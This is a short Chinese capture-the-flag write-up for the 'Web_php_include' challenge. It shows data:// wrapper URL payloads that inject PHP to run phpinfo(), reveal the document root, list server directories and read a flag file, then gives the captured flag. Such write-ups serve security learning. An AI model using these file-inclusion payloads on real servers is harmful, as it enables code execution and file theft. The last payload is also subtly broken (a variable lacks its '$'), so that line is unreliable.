攻防世界---Web_php_include

1.题目链接

2.补充知识:

3.构造:执行成功

/?page=data://text/plain,<?php phpinfo()?>

4.构造下面url,得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>

5构造下面url,读取该路径的文件

?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

相关推荐
A尘埃2 分钟前
Java业务场景(高并发+高可用+分布式)
java·开发语言·分布式
晨曦夜月5 分钟前
头文件与目标文件的关系
linux·开发语言·c++
wearegogog1239 分钟前
C# 条码打印程序(一维码 + 二维码)
java·开发语言·c#
9527(●—●)10 分钟前
windows系统python开发pip命令使用(菜鸟学习)
开发语言·windows·python·学习·pip
松涛和鸣15 分钟前
32、Linux线程编程
linux·运维·服务器·c语言·开发语言·windows
sali-tec16 分钟前
C# 基于halcon的视觉工作流-章69 深度学习-异常值检测
开发语言·图像处理·算法·计算机视觉·c#
我是唐青枫18 分钟前
深入理解 C#.NET 运算符重载:语法、设计原则与最佳实践
开发语言·c#·.net
张np44 分钟前
java基础-Deque 接口
java·开发语言
柒壹漆1 小时前
用Python制作一个USB Hid设备数据收发测试工具
开发语言·git·python
LXS_3571 小时前
Day 16 C++提高之模板
开发语言·c++·笔记·学习方法